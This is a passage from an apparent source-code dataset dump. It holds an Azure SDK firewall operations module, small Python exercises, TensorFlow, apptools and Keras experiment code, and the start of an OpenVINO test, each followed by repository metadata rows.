deserialized = self._deserialize('AzureFirewall', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
azure_firewall_name: str,
parameters: "models.AzureFirewall",
**kwargs
) -> "models.AzureFirewall":
"""Creates or updates the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:param parameters: Parameters supplied to the create or update Azure Firewall operation.
:type parameters: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: AzureFirewall, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
azure_firewall_name=azure_firewall_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["models.AzureFirewallListResult"]:
"""Lists all Azure Firewalls in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AzureFirewallListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_04_01.models.AzureFirewallListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewallListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('AzureFirewallListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls'} # type: ignore
def list_all(
self,
**kwargs
) -> AsyncIterable["models.AzureFirewallListResult"]:
"""Gets all the Azure Firewalls in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AzureFirewallListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_04_01.models.AzureFirewallListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewallListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('AzureFirewallListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/azureFirewalls'} # type: ignore
| [
"[email protected]"
] | |
cecfbc03e21c8156c775e484b68292ec8c14c60f | 4dc4345cca9c5f452bf4b87263505ee6b4e960af | /data_types_and_variables/contact_names.py | 2e5c1b630d63078c6ee3b04f570a368583e63c4b | [] | no_license | ivan-yosifov88/python_fundamentals | 88c7eb5167bbe6692b95051d1551496a84893524 | 1cfe6d18453362fc26be984f6cb871b9d7dec63d | refs/heads/master | 2023-03-29T16:46:55.363035 | 2021-04-07T10:39:44 | 2021-04-07T10:39:44 | 341,604,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | first_name = input()
last_name = input()
delimiter = input()
print(f"{first_name}{delimiter}{last_name}") | [
"ivan.yosifov88gmail.com"
] | ivan.yosifov88gmail.com |
d0ec0a41b10c508f07c1ac2e6b2c38ba42f77c1e | 6e58f95a931db523a3957134ff8cac670d4c20be | /Hunter level/given 2 string checking whether they are same without using built in function.py | 0b85adde15d8c4f9f377c2739745e69844479191 | [] | no_license | ramyasutraye/python-programming-13 | 36235f324152d793ca1b2bf087d2a49a62d47787 | ea58462208bb4da826b9f1917bdad17c80d055dc | refs/heads/master | 2020-04-23T19:30:53.189933 | 2018-05-02T17:13:30 | 2018-05-02T17:13:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=str(input())
b=str(input())
l1=len(a)
l2=len(b)
if(l1==l2):
for i in range (l1):
if a[i]==b[i]:
flag=1
else:
flag=0
if (flag==1):
print ("yes")
else:
print ("no")
else:
print ("no")
| [
"[email protected]"
] | |
9cd8a6e55a4e5085df6657d0a04781d0dee9ed7b | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/training/saver_large_variable_test.py | f19600a79e7b85bc841cc500c0681bd62a3cd3a6 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 2,386 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tensorflow.python.training.saver.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
class SaverLargeVariableTest(test.TestCase):
# NOTE: This is in a separate file from saver_test.py because the
# large allocations do not play well with TSAN, and cause flaky
# failures.
def testLargeVariable(self):
save_path = os.path.join(self.get_temp_dir(), "large_variable")
with session.Session("", graph=ops.Graph()) as sess:
# Declare a variable that is exactly 2GB. This should fail,
# because a serialized checkpoint includes other header
# metadata.
with ops.device("/cpu:0"):
var = variables.Variable(
constant_op.constant(
False, shape=[2, 1024, 1024, 1024], dtype=dtypes.bool))
save = saver.Saver(
{
var.op.name: var
}, write_version=saver_pb2.SaverDef.V1)
var.initializer.run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Tensor slice is too large to serialize"):
save.save(sess, save_path)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
3d6963aee849bab68187c59aa775a10ae4a266f5 | 84b5ac79cb471cad1d54ed1d2c842dc5581a03f0 | /branches/pylint/config/scripts/paella-export-profile | 777b1b8eccf1dd0bbd7a397eb1c75fd8f43c9ebf | [] | no_license | BackupTheBerlios/paella-svn | c8fb5ea3ae2a5e4ca6325a0b3623d80368b767f3 | d737a5ea4b40f279a1b2742c62bc34bd7df68348 | refs/heads/master | 2021-01-18T14:07:40.881696 | 2012-11-13T20:33:08 | 2012-11-13T20:33:08 | 40,747,253 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 377 | #!/usr/bin/env python
import os, sys
from paella.db import PaellaConnection
from paella.db.profile.xmlgen import PaellaProfiles
conn = PaellaConnection()
args = sys.argv[1:]
profile = args[0]
profiles = PaellaProfiles(conn)
tfile = file(profile + '.xml', 'w')
xml = profiles.export_profile(profile)
xml.writexml(tfile, indent='\t', newl='\n', addindent='\t')
tfile.close()
| [
"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] | umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f |
|
bbbfb496488a02ad49a1820a1d8e385052809eb7 | 3950cb348a4a3ff6627d502dbdf4e576575df2fb | /.venv/Lib/site-packages/apptools/persistence/versioned_unpickler.py | 25338c9278da68d60cad7b6d117da78e73aaacdc | [] | no_license | Bdye15/Sample_Programs | a90d288c8f5434f46e1d266f005d01159d8f7927 | 08218b697db91e55e8e0c49664a0b0cb44b4ab93 | refs/heads/main | 2023-03-02T04:40:57.737097 | 2021-01-31T03:03:59 | 2021-01-31T03:03:59 | 328,053,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,883 | py | # (C) Copyright 2005-2020 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
# Standard library imports
from pickle import _Unpickler as Unpickler
from pickle import UnpicklingError, BUILD
import logging
from types import GeneratorType
# Enthought library imports
from apptools.persistence.updater import __replacement_setstate__
logger = logging.getLogger(__name__)
##############################################################################
# class 'NewUnpickler'
##############################################################################
class NewUnpickler(Unpickler):
"""An unpickler that implements a two-stage pickling process to make it
possible to unpickle complicated Python object hierarchies where the
unserialized state of an object depends on the state of other objects in
the same pickle.
"""
def load(self, max_pass=-1):
"""Read a pickled object representation from the open file.
Return the reconstituted object hierarchy specified in the file.
"""
# List of objects to be unpickled.
self.objects = []
# We overload the load_build method.
dispatch = self.dispatch
dispatch[BUILD[0]] = NewUnpickler.load_build
# call the super class' method.
ret = Unpickler.load(self)
self.initialize(max_pass)
self.objects = []
# Reset the Unpickler's dispatch table.
dispatch[BUILD[0]] = Unpickler.load_build
return ret
def initialize(self, max_pass):
# List of (object, generator) tuples that initialize objects.
generators = []
# Execute object's initialize to setup the generators.
for obj in self.objects:
if hasattr(obj, "__initialize__") and callable(obj.__initialize__):
ret = obj.__initialize__()
if isinstance(ret, GeneratorType):
generators.append((obj, ret))
elif ret is not None:
raise UnpicklingError(
"Unexpected return value from "
"__initialize__. %s returned %s" % (obj, ret)
)
# Ensure a maximum number of passes
if max_pass < 0:
max_pass = len(generators)
# Now run the generators.
count = 0
while len(generators) > 0:
count += 1
if count > max_pass:
not_done = [x[0] for x in generators]
msg = """Reached maximum pass count %s. You may have
a deadlock! The following objects are
uninitialized: %s""" % (
max_pass,
not_done,
)
raise UnpicklingError(msg)
for o, g in generators[:]:
try:
next(g)
except StopIteration:
generators.remove((o, g))
# Make this a class method since dispatch is a class variable.
# Otherwise, supposing the initial VersionedUnpickler.load call (which
# would have overloaded the load_build method) makes a pickle.load call at
# some point, we would have the dispatch still pointing to
# NewPickler.load_build whereas the object being passed in will be an
# Unpickler instance, causing a TypeError.
def load_build(cls, obj):
# Just save the instance in the list of objects.
if isinstance(obj, NewUnpickler):
obj.objects.append(obj.stack[-2])
Unpickler.load_build(obj)
load_build = classmethod(load_build)
class VersionedUnpickler(NewUnpickler):
"""This class reads in a pickled file created at revision version 'n'
and then applies the transforms specified in the updater class to
generate a new set of objects which are at revision version 'n+1'.
I decided to keep the loading of the updater out of this generic class
because we will want updaters to be generated for each plugin's type
of project.
This ensures that the VersionedUnpickler can remain ignorant about the
actual version numbers - all it needs to do is upgrade one release.
"""
def __init__(self, file, updater=None):
Unpickler.__init__(self, file)
self.updater = updater
def find_class(self, module, name):
"""Overridden method from Unpickler.
NB __setstate__ is not called until later.
"""
if self.updater:
# check to see if this class needs to be mapped to a new class
# or module name
original_module, original_name = module, name
module, name = self.updater.get_latest(module, name)
# load the class...
klass = self.import_name(module, name)
# add the updater.... TODO - why the old name?
self.add_updater(original_module, original_name, klass)
else:
# there is no updater so we will be reading in an up to date
# version of the file...
try:
klass = Unpickler.find_class(self, module, name)
except Exception:
logger.error("Looking for [%s] [%s]" % (module, name))
logger.exception(
"Problem using default unpickle functionality"
)
# restore the original __setstate__ if necessary
fn = getattr(klass, "__setstate_original__", False)
if fn:
setattr(klass, "__setstate__", fn)
return klass
def add_updater(self, module, name, klass):
"""If there is an updater defined for this class we will add it to the
class as the __setstate__ method.
"""
fn = self.updater.setstates.get((module, name), False)
if fn:
# move the existing __setstate__ out of the way
self.backup_setstate(module, klass)
# add the updater into the class
setattr(klass, "__updater__", fn)
# hook up our __setstate__ which updates self.__dict__
setattr(klass, "__setstate__", __replacement_setstate__)
else:
pass
def backup_setstate(self, module, klass):
"""If the class has a user defined __setstate__ we back it up."""
if getattr(klass, "__setstate__", False):
if getattr(klass, "__setstate_original__", False):
# don't overwrite the original __setstate__
name = "__setstate__%s" % self.updater.__class__
else:
# backup the original __setstate__ which we will restore
# and run later when we have finished updating the class
name = "__setstate_original__"
method = getattr(klass, "__setstate__")
setattr(klass, name, method)
else:
# the class has no __setstate__ method so do nothing
pass
def import_name(self, module, name):
"""
If the class is needed for the latest version of the application then
it should presumably exist.
If the class no longer exists then we should perhaps return
a proxy of the class.
If the persisted file is at v1 say and the application is at v3 then
objects that are required for v1 and v2 do not have to exist they only
need to be placeholders for the state during an upgrade.
"""
module = __import__(module, globals(), locals(), [name])
return vars(module)[name]
| [
"[email protected]"
] | |
c3d059c6a856c09a0127d8793a81b5c97ef00863 | a3ff8c37e8079412477e203faa2f9526ffb66b7a | /realworld_expt/expt.py | 9d07e0d72ad6f148d9a7608d719a22062f2252cf | [] | no_license | greentfrapp/temp | 07c83aaf08dd236f6305af877280698612129681 | 406864f3c7c2f78c23df2c29b640ba9ea622eb27 | refs/heads/master | 2020-03-29T19:24:48.466126 | 2019-01-30T15:14:10 | 2019-01-30T15:14:10 | 150,261,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,493 | py | from __future__ import print_function
try:
raw_input
except:
raw_input = input
import numpy as np
from keras.models import load_model
import json
import tensorflow as tf
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
from scipy.stats import chi
from absl import flags
from absl import app
from utils import MammoData as Data
FLAGS = flags.FLAGS
flags.DEFINE_bool("plot", False, "Plot")
flags.DEFINE_bool("train", False, "Train")
flags.DEFINE_integer("std", 10, "std")
flags.DEFINE_integer("iter", 5, "No. of iForest runs per sample set")
flags.DEFINE_integer("samples", 5, "No. of sample sets generated")
def cal_auc(x, y):
return np.trapz(y, x)
def get_dist(values):
center = np.mean(values, axis=0)
std = np.std(values, axis=0)
chi_std = chi.std(2, 0, np.linalg.norm(std))
dist = np.linalg.norm(values - center, axis=1)
for i, el in enumerate(dist):
if el > 2.7 * chi_std:
dist[i] = 0.
elif el < 2.3 * chi_std:
dist[i] = 0.
# dist = np.exp(dist)
dist /= np.sum(dist)
return dist
def roc_val(classifier, x_test, y_test):
predictions = classifier.predict(x_test)
predicted_anomalies = (predictions == -1).astype(np.int32)
tp = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 1)
tn = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 0)
fp = np.sum(predicted_anomalies) - tp
fn = np.sum(predicted_anomalies == 0) - tn
if tp == 0:
recall = tp_rate = 0.
precision = 1.
else:
recall = tp_rate = tp / (tp + fn)
precision = tp / (tp + fp)
if recall + precision == 0:
f1 = 0.
else:
f1 = (2 * recall * precision) / (recall + precision)
fp_rate = fp / (fp + tn)
return {"TPR": tp_rate, "FPR": fp_rate, "F1": f1}
def generate(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
latent = encoder.predict(x)
center = np.mean(latent, axis=0)
latent = np.random.randn(synth_size, 2)
for i, vector in enumerate(latent):
latent[i] = 10. * vector / np.linalg.norm(vector)
latent += center
samples = decoder.predict(latent.reshape(-1, 2))
with open(folder + "synthetic_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples.tolist(), file)
return samples
def smote(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
samples = []
for i in np.arange(synth_size):
choice = np.random.choice(np.arange(len(x)))
a = x[choice]
x_copy = np.concatenate((x[:choice], x[choice + 1:]))
x_copy -= a
x_copy = np.linalg.norm(x_copy, axis=1)
b = np.argmin(x_copy)
if b >= choice:
b += 1
b = x[b]
scale = np.random.rand()
c = scale * (a-b) + b
samples.append(list(c))
with open(folder + "smote_reg_data_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples, file)
return samples
def expt(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x_synth = {
"doping": generate(n_run),
"smote": smote(n_run),
}
x = {
"original": x_train,
}
for synth_type in x_synth:
x[synth_type] = np.concatenate((x_train, x_synth[synth_type]))
stat_types = ["TPR", "FPR", "F1"]
stats = {}
for method in x:
stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
con_vals = np.arange(0.01, 0.3, 0.02)
con_vals = np.concatenate(([0.001, 0.003, 0.005, 0.007], con_vals))
for i, con_val in enumerate(con_vals):
print("Run #{}/{}".format(i + 1, len(con_vals)))
run_stats = {}
for method in x:
run_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for j in np.arange(FLAGS.iter):
classifiers = {}
for method in x:
classifiers[method] = IsolationForest(contamination=con_val)
classifiers[method].fit(x[method])
results = roc_val(classifiers[method], x_test, y_test)
for stat in results:
run_stats[method][stat].append(results[stat])
for method in stats:
for stat in stat_types:
stats[method][stat].append(np.mean(run_stats[method][stat]))
return stats
def train():
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
all_stats = {}
for method in methods:
all_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for i in np.arange(FLAGS.samples):
expt_stats = expt(i)
for method in methods:
for stat in stat_types:
all_stats[method][stat].append(expt_stats[method][stat])
for method in methods:
for stat in stat_types:
all_stats[method][stat] = np.mean(all_stats[method][stat], axis=0).tolist()
with open(folder + "stats.json".format(FLAGS.std), 'w') as file:
json.dump(all_stats, file)
def plot(all_stats, methods=None):
f1_list = []
auc_list = []
g_list = []
if methods == None:
methods = all_stats.keys()
for method in methods:
# print("\n" + method)
f1 = np.max(all_stats[method]["F1"])
auc = cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))
# print("F1[{}]\t{}".format(np.argmax(all_stats[method]["F1"]), np.max(all_stats[method]["F1"])))
# print("AUC\t{}".format(cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))))
f1_list.append([f1, method])
auc_list.append([auc, method])
r = all_stats[method]["TPR"][np.argmax(all_stats[method]["F1"])]
p = f1 * r / (2 * r - f1)
g = (r * p) ** 0.5
# print(2 * p * r / (p + r))
# print(p, r, f1)
g_list.append([g, method])
f1_list.sort(reverse=True)
auc_list.sort(reverse=True)
g_list.sort(reverse=True)
print("\nF1:")
for [f1, method] in f1_list:
print("{}: {}".format(method, f1))
print("\nAUC:")
for [auc, method] in auc_list:
print("{}: {}".format(method, auc))
print("\nG:")
for [g, method] in g_list:
print("{}: {}".format(method, g))
def main(unused_argv):
global desc, folder, synth_size, encoder, decoder, dataset
desc = "aae"
folder = "./expt_std{}_temp2/".format(FLAGS.std)
folder = "./"
tf.gfile.MakeDirs(folder)
synth_size = 1100
encoder = load_model('{}_encoder_{}_test.h5'.format(desc, FLAGS.std))
decoder = load_model('{}_decoder_{}_test.h5'.format(desc, FLAGS.std))
dataset = Data()
if FLAGS.train:
train()
elif FLAGS.plot:
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
with open(folder + "stats.json".format(FLAGS.std), 'r') as file:
all_stats = json.load(file)
plot(all_stats, methods)
if __name__ == "__main__":
app.run(main)
| [
"[email protected]"
] | |
012bdc029e1fff6ec79f8cfc06baae7b9eb69a44 | ffa8b19913d891a655ff78384847ea9fdc5b0bc9 | /test/test_group_id_for_group_user_inclusion.py | 9c9b9f0104942ca2565e0a4e5b474fdf91deaf59 | [] | no_license | ccalipSR/python_sdk2 | b76124f409e26128ff291d2c33612883929c1b5f | d8979ed7434f4ffbc62fc30c90d40d93a327b7d1 | refs/heads/master | 2020-04-09T17:13:43.581633 | 2018-12-05T06:53:50 | 2018-12-05T06:53:50 | 160,473,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,613 | py | # coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) # noqa: E501
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group_id_for_group_user_inclusion import GroupIdForGroupUserInclusion # noqa: E501
from swagger_client.rest import ApiException
class TestGroupIdForGroupUserInclusion(unittest.TestCase):
"""GroupIdForGroupUserInclusion unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroupIdForGroupUserInclusion(self):
"""Test GroupIdForGroupUserInclusion"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.group_id_for_group_user_inclusion.GroupIdForGroupUserInclusion() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
dec281751603425b8397dc65a0ebbd7b8b50ff7f | a564b8277e33eb27009089ec2e216a4d266a8861 | /官方配套代码/15/15.3/Senior/server/CrazyitDict.py | 6fc2e469e9af559f3323a86b8dde9a2555759584 | [
"Unlicense"
] | permissive | yifengyou/crazy-python | 3cb50f462e4ddb921c365e2f0cb3e846e6539383 | 28099bd5011de6981a7c5412783952cc7601ae0c | refs/heads/main | 2023-06-18T18:10:52.691245 | 2021-07-18T14:21:03 | 2021-07-18T14:21:03 | 387,088,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,708 | py | # coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee [email protected] #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
class CrazyitDict(dict):
# 根据value查找key
def key_from_value(self, val):
# 遍历所有key组成的集合
for key in self.keys():
# 如果指定key对应的value与被搜索的value相同,则返回对应的key
if self[key] == val:
return key
return None
# 根据value删除key
def remove_by_value(self, val):
# 遍历所有key组成的集合
for key in self.keys():
# 如果指定key对应的value与被搜索的value相同,则返回对应的key
if self[key] == val:
self.pop(key)
return
| [
"[email protected]"
] | |
9e04759332a82f222f84a256886b4bd3e5300456 | e42478c0c501a11280a3b0b3266a931215fd5a34 | /fxdayu_data/handler/base.py | 3e03b7fc7e8eeb0830d6ff42ded200f68ffccb42 | [] | no_license | limingbei/fxdayu_data | d36af819ee32e32e541eaf205b0e1c9309ffc89a | 2d1541def42b31e839e1027a85cfd08665f731a3 | refs/heads/master | 2020-03-17T23:16:37.656128 | 2018-01-05T05:50:41 | 2018-01-05T05:50:41 | 134,038,018 | 1 | 0 | null | 2018-05-19T06:55:59 | 2018-05-19T06:55:59 | null | UTF-8 | Python | false | false | 475 | py | # encoding:utf-8
from datetime import datetime
from pymongo.mongo_client import database
import pandas as pd
import pymongo
class DataHandler(object):
def write(self, *args, **kwargs):
pass
def read(self, *args, **kwargs):
pass
def inplace(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def delete(self, *args, **kwargs):
pass
def table_names(self, *args, **kwargs):
pass
| [
"[email protected]"
] | |
4b6c1a8e10bab33aaa6629088bb2f48ab5184699 | d2bb13cec7faf28e3d268312298f03c99806bd8b | /calc_tdc_offset/corelli_calc_tdc_offset_func_loop.py | f73d0e5a8641d0c738264885957499cec67aac99 | [] | no_license | rosswhitfield/corelli | 06a91c26556ea788f20f973a1018a56e82a8c09a | d9e47107e3272c4457aa0d2e0732fc0446f54279 | refs/heads/master | 2021-08-07T14:04:24.426151 | 2021-08-03T19:19:05 | 2021-08-03T19:19:05 | 51,771,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | from corelli_calc_tdc_offset_func import *
for i in range(637,640):
#for i in range(2100,2110):
filename='CORELLI_'+str(i)
results=calc_tdc_offset(filename)
print results
| [
"[email protected]"
] | |
6dfbfef776daceb15fe420c71a7effaf85379b71 | 2ae0b8d95d439ccfd55ea7933ad4a2994ad0f6c5 | /tests/layer_tests/pytorch_tests/test_convnd.py | 8b46b2992d2c072c48f4b6aaa35fbb0cdf2c3517 | [
"Apache-2.0"
] | permissive | openvinotoolkit/openvino | 38ea745a247887a4e14580dbc9fc68005e2149f9 | e4bed7a31c9f00d8afbfcabee3f64f55496ae56a | refs/heads/master | 2023-08-18T03:47:44.572979 | 2023-08-17T21:24:59 | 2023-08-17T21:24:59 | 153,097,643 | 3,953 | 1,492 | Apache-2.0 | 2023-09-14T21:42:24 | 2018-10-15T10:54:40 | C++ | UTF-8 | Python | false | false | 10,460 | py | # Copyright (C) 2018-2023 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import pytest
from openvino.frontend import FrontEndManager
from openvino.frontend.pytorch.ts_decoder import TorchScriptPythonDecoder
from pytorch_layer_test_class import PytorchLayerTest
class TestConv2D(PytorchLayerTest):
def _prepare_input(self):
import numpy as np
return (np.random.randn(2, 3, 25, 25).astype(np.float32),)
